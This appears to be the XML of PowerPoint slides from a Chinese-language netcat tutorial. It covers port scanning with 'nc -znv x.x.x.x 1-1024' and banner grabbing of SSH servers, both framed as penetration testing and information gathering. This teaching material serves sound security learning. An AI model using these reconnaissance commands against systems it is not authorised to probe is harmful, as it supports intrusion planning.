            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6368488" y="2575486"/>
            <a:ext cx="363752" cy="373961"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2788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a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" spc="150" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" spc="150" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="MH_Entry_1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7380312" y="3572062"/>
            <a:ext cx="363752" cy="373961"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2788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a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" spc="150" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" spc="150" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="直接连接符 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6428970" y="2543176"/>
            <a:ext cx="1341667" cy="134166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文本框 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611363" y="2860937"/>
            <a:ext cx="3259304" cy="437515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令行简介</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="225" dirty="0">
              <a:latin typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611363" y="3617222"/>
            <a:ext cx="3259304" cy="437515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="225" dirty="0">
              <a:latin typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="3" grpId="0" animBg="1"/>
      <p:bldP spid="4" grpId="0"/>
      <p:bldP spid="5"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直角三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1273629"/>
            <a:ext cx="6836228" cy="3869871"/>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书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3610610" y="1305560"/>
            <a:ext cx="5105400" cy="3300095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="600">
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr sz="1400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在 “招数 1” 里面介绍了：如何测试【单个】端口是否可达。  </a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　　扩展一下：如果你要测试的不止一个端口，而是某个【范围】的端口。这种行为有个专门的术语叫【端口扫描】。  </a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　　“端口扫描” 是一把双刃剑——“黑帽子” 用这招进行信息收集，为后续的入侵做铺垫；“白帽子” 用这招来进行 “渗透测试”，以排查自己系统中【尚未屏蔽】的对外监听端口。  </a:t>
            </a:r>
            <a:endParaRPr sz="14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矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786130" y="446405"/>
            <a:ext cx="7358380" cy="868680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>招数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：（渗透测试）用 nc 玩 “端口扫描”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="5"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24205" y="2941955"/>
            <a:ext cx="7895590" cy="1929765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="3075305"/>
            <a:ext cx="7774305" cy="1673225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>玩“端口扫描”的时候，“-v选项”会把“成功 / 失败”的结果统统打印出来。  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>通常大伙儿关注的都是“扫描成功”的那些端口。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624298" y="1260670"/>
            <a:ext cx="7895406" cy="1495425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624297" y="1262031"/>
            <a:ext cx="1914585" cy="5921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2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745233" y="1854211"/>
            <a:ext cx="7774471" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>上面这个命令，用来扫描 IP 地址为 x.x.x.x 的主机，扫描的端口范围从 1 到 1024</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="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矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695635" y="446207"/>
            <a:ext cx="3752730" cy="468630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915920" y="1370330"/>
            <a:ext cx="4329430" cy="375920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc -znv x.x.x.x 1-1024</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" spc="450"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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683260" y="4444365"/>
            <a:ext cx="7787005" cy="314960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc -znv x.x.x.x 1-1024  2&gt;&amp;1 | grep succeeded</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="17" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="2"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直角三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1273629"/>
            <a:ext cx="6836228" cy="3869871"/>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书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3610610" y="1305560"/>
            <a:ext cx="5105400" cy="2561590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="600">
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>入侵者在发起攻击之前，有一个很重要的步骤叫做【信息收集】。攻击者对目标了解得越多，得手的机会就越大。  </a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>下面以 SSH Server（sshd）举例。</a:t>
            </a:r>
            <a:endParaRPr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矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786130" y="446405"/>
            <a:ext cx="7358380" cy="868680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>招数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：（信息收集）用 nc 探测 “服务器类型” 和“软件版本”（以 SSH 为例）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="5"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24205" y="1260475"/>
            <a:ext cx="7895590" cy="2340610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624297" y="1262031"/>
            <a:ext cx="1914585" cy="5921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2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745233" y="1854211"/>
            <a:ext cx="7774471" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
